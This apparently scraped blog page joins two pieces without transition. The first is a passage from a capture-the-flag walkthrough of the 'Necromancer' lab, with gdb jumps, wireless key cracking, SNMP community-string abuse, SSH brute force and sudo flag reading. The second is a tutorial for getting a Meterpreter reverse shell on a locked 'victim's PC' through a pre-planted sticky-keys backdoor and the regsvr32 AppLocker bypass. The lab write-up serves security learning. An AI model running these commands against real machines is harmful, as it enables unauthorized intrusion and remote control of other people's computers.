![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-ywMB6nKL3zc/WEEZNbBxquI/AAAAAAAAOb0/ozreJYqkw9YwzRaelYKrcCl0KCaoCBEpwCLcB/s640/18.png?w=687&ssl=1)
Get some info about the functions-
info functions
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-LOFW9fW8gtI/WEEZNnaUykI/AAAAAAAAOb4/n06MPSWRV7sVlkBh60J27JIpAkNFnzj9wCLcB/s1600/19.png?w=687&ssl=1)
Create a break point at wearTalisman because after all we want to wear the talisman.
break wearTalisman
run
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-WWqGGirtBOY/WEEb4-JKwEI/AAAAAAAAOc0/QSNeeN7wwpQTsvdELEadf7RpTakv-LOVQCLcB/s1600/20.png?w=687&ssl=1)
And then jump to chantToBreakSpell
jump chantToBreakSpell
Yes! We succeeded in wearing the talisman. We get our 4th flag and a hint to chant the flag's words at UDP port 31337.
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/--twthfrbE54/WEEb1jiQS-I/AAAAAAAAOcw/0nDjlzO8Dy0GLePVV1V9RP9UZcDRSh3qACLcB/s640/21.png?w=687&ssl=1)
The words appear to be an md5 hash; upon decrypting it we get "blackmagic". We now use netcat to connect to port 31337 and type in "blackmagic" there.
nc -unv 192.168.0.110 31337
blackmagic
And we get another directory along with our 5th flag
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Y2tzV7oQZhE/WEEckzYmUUI/AAAAAAAAOdA/WNL_HjioybUGVzQ6ToDFLaOXLUb4lBaYwCLcB/s640/22.png?w=687&ssl=1)
We open the directory with our victim’s IP.
![[Image: 23.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-anKi-vMGcI8/WEEclB9VtdI/AAAAAAAAOdE/8OZn5O6cHzcTr5CdgnK7uWU6IbFDOVycACLcB/s640/23.png?w=687&ssl=1)
Another web page, with a hint to look at UDP port 161 (used for SNMP), and a close look reveals that the word "necromancer" just before the image is actually a link. Upon clicking it we get another file to download named "necromancer". We download and unzip it. It contains a cap file named necromancer. Upon analysing this file with Wireshark, we discover that the 802.11 protocol is being used. This indicates that the file is a wireless capture, so let's try to crack the key using aircrack-ng with rockyou.txt as our dictionary.
aircrack-ng /root/Desktop/necromancer.cap -w /usr/share/wordlists/rockyou.txt
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-8jJhm2Ybz_s/WEEcku7ijHI/AAAAAAAAOc8/2Sg-Zu_rFgEVL9iMO-JIitjErlxGwquQgCLcB/s640/24.png?w=687&ssl=1)
This cracks the key: death2all. Use it as the community string for port 161, i.e. SNMP.
snmpwalk -c death2all -v 1 192.168.0.110
![[Image: 25.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-syJPdc3IFa0/WEEcltxdM5I/AAAAAAAAOdI/zN8l1SHbcPouDlseU1WZ3KyO-GCkD40RwCLcB/s640/25.png?w=687&ssl=1)
![[Image: 26.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-HOvUGPEirqQ/WEEcl-vABYI/AAAAAAAAOdM/H12ElS5GbeYgD636gxo-IZMKNz2JRlBywCLcB/s640/26.png?w=687&ssl=1)
Let’s try to unlock it using snmpset.
snmpset -c death2allrw -v 1 192.168.0.110 iso.3.6.1.2.1.1.6.0 s Unlocked
When the string changes to “Unlocked”, we run our previous command once again
snmpwalk -c death2all -v 1 192.168.0.110
![[Image: 27.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-jh1nP8_hDWc/WEEcmdLrQDI/AAAAAAAAOdQ/ILJAKbT8ktMP0b_4BYD8d7ozPJas23IsQCLcB/s640/27.png?w=687&ssl=1)
Voila!! The door unlocks and we get another flag along with a clue, i.e. TCP port 22 (used for SSH): flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22. Another md5 hash, which decrypts to "demonslayer".
We try to login to port 22 assuming “demonslayer” to be the password but fail.
ssh 192.168.0.110
demonslayer
![[Image: 28.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-SUsutPFZfTc/WEEcmdbUFCI/AAAAAAAAOdU/CWLSbUBVSc4rrOpI2wa57TM6Gz6b9qY9gCLcB/s1600/28.png?w=687&ssl=1)
In msfconsole we search for the ssh_login module:
search ssh_login
Thereafter we run the following commands:
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.0.110
set username demonslayer
set pass_file /usr/share/wordlists/rockyou.txt
run
![[Image: 30.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-nfYQVy5xQVw/WEEcm-pJqaI/AAAAAAAAOdY/QN7svMgwcz4DE-UVkh5BuOLP9iY3QydngCLcB/s640/30.png?w=687&ssl=1)
We get password as 12345678 and a shell as well.
![[Image: 31.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-1DJFLVIivdE/WEEcnjJk4eI/AAAAAAAAOdc/dgrP1C96sFcXvZWZ6xdSZs5YFgfZknilQCLcB/s640/31.png?w=687&ssl=1)
But neither ls nor dir seems to be working on this shell.
![[Image: 32.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-DdEtI83ieNI/WEEd97-0LGI/AAAAAAAAOds/x1POrS6_EeAz79c8CaFkQlLCjd2OzNYvwCLcB/s640/32.png?w=687&ssl=1)
So we log in to SSH from a terminal on the host using demonslayer/12345678.
ssh demonslayer@192.168.0.110
12345678
![[Image: 33.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-_KUDgURGyHI/WEEekqqaZKI/AAAAAAAAOd8/xUOxh-9PU5Y7EYnRRjs39mIRQDIIZg5vgCLcB/s640/33.png?w=687&ssl=1)
Using ls -la we discover that there lies a flag8.txt file in the directory. To read its contents we use
cat flag8.txt
![[Image: 34.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-QzDurZzwbkM/WEEem2t6pUI/AAAAAAAAOeE/uGOmt_znzUEWN1u2EVwm9OsgAJ86trVRwCLcB/s640/34.png?w=687&ssl=1)
We get another hint regarding UDP port 777. This does not work from our PC, so let us try it from the victim's shell:
nc -u localhost 777
and hit Enter twice.
![[Image: 35.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-hj7LLMAdVvE/WEEejYYCocI/AAAAAAAAOd4/n9RTcYnbv7cUIAToJ57OetKBqZKobwdaACLcB/s640/35.png?w=687&ssl=1)
So the Necromancer is now trying to play a game with us. Upon googling his question "Where do the Black Robes practice magic of the Greater Path?" we get the answer: it's Kelewan.
![[Image: 36.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-9XAkP0Jec0Q/WEEelUqVdfI/AAAAAAAAOeA/EgExN2eQfiY1mV4sE-BoI-1RpKhBaYqEACLcB/s1600/36.png?w=687&ssl=1)
Our 8th flag is here: flag8{55a6af2ca3fee9f2fef81d20743bda2c}, and another question as well, which asks "Who did Johann Faust VIII make a deal with?" Google tells us the answer to this question is Mephistopheles.
![[Image: 37.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-21nuCJLfm78/WEEem4Y_5iI/AAAAAAAAOeI/q6ZdaYhSoJ0BUvi1bg1y5-yYnULkJP7EACLcB/s1600/37.png?w=687&ssl=1)
flag9{713587e17e796209d1df4c9c2c2d2966}
And we get the next flag and yet another question “Who is tricked into passing the Ninth Gate?” Google comes in handy again and tells us the answer once more. The next answer is Hedge.
![[Image: 38.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-s7sS0iioXgU/WEEeobYxZ2I/AAAAAAAAOeM/DKLBBnm5sDASE-7P9Jolpdr0rA8myiAJwCLcB/s640/38.png?w=687&ssl=1)
And our next flag awaits us: flag10{8dc6486d2c63cafcdc6efbba2be98ee4}. Nothing more to be noticed here. But if I am not wrong, we did see this "small vile" thing somewhere earlier. Let's head back with Ctrl+C and look for it.
We type in ls -la and yes, it's there: ".smallvile", which we just learned about in the description alongside our 10th flag. Let's open it using cat.
cat .smallvile
![[Image: 39.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-igNaS4AB4hE/WEEeqY3MupI/AAAAAAAAOeY/JVoqjcmAGXUfWc9lxJuzMLfiFOD6O6xLgCLcB/s1600/39.png?w=687&ssl=1)
Hopefully this opened up some gates, because we don't see any clue here. Let's try sudo.
sudo -l
![[Image: 40.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-jokdQJB_xCM/WEEepUDtdwI/AAAAAAAAOeQ/0q8DTQ8aks8Cjfa0lFVdQmI50OVxOeUuwCLcB/s1600/40.png?w=687&ssl=1)
Seems to be working. It shows us the location of our 11th flag and that reading flag11.txt through sudo does not require a password. Let's try to open it.
sudo /bin/cat /root/flag11.txt
![[Image: 41.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-Uw1x8NPkcFA/WEEeprwKqfI/AAAAAAAAOeU/DyEhGXECWZs2i6kHBdWcERtVYbGp-9zTACLcB/s1600/41.png?w=687&ssl=1)
![[Image: 42.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-WpF3CD4RPOE/WEEesOu3azI/AAAAAAAAOec/WfJMNlJDcwkV9KsUKyOuzMhLk92BgilRACLcB/s640/42.png?w=687&ssl=1)
Let's learn how to get a Meterpreter session on a PC in the network which is switched on but locked and has Remote Desktop enabled.
Let us assume that the victim's PC already has the utilman or sticky keys attack enabled on it (a guide on sticky keys is linked in the original post). You do not need physical access to the victim's PC for this attack.
First, run metasploit on your pc.
$msfconsole
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-dHpTn2UjPxY/WD7Lis-8YpI/AAAAAAAAOYc/FaItlVJmRKowUzHbKfJdj91cKhx5JxfbwCLcB/s1600/1.png?w=687&ssl=1)
Thereafter, we search for regsvr32_applocker_bypass_server, use the exploit, set the payload, lhost and lport, and run exploit.
use exploit/windows/misc/regsvr32_applocker_bypass_server
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-YRCd3u1gxtE/WD7Lilb8hXI/AAAAAAAAOYg/GWQ4d9a5G0IyEo3P3tfOTvyFzhQDtD-rACLcB/s1600/2.png?w=687&ssl=1)
Open another terminal to take a Remote Desktop session of the victim's PC and enter the victim's IP.
$rdesktop 192.168.0.103
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-4mAXM6TB8Ds/WD7LitnEFII/AAAAAAAAOYY/MQEiOKbgGKUFCn6H_NQ4KzyXpCYvKbCrgCLcB/s1600/3.png?w=687&ssl=1)
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Arn7zWkW9RA/WD7LjqsqfpI/AAAAAAAAOYk/azLzwDnh0uQEBpm1A1Kg3Evn3EuqRQfKQCLcB/s1600/4.png?w=687&ssl=1)
Press the “shift” key 5 times to bring up the command prompt.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-wmoG8qUVvjM/WD7LjjqUa6I/AAAAAAAAOYo/6bj_4CPaPeEkcLxiT5Qb-EuZbs8ghlnHgCLcB/s1600/5.png?w=687&ssl=1)
Returning to our previous terminal with meterpreter, we have finally got a session on the victim's PC in our terminal.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Pd87ZvgS718/WD7LkPinprI/AAAAAAAAOYs/7j4jhrmLPhA8BE7lraENlryV9XVad-y2QCLcB/s1600/6.png?w=687&ssl=1)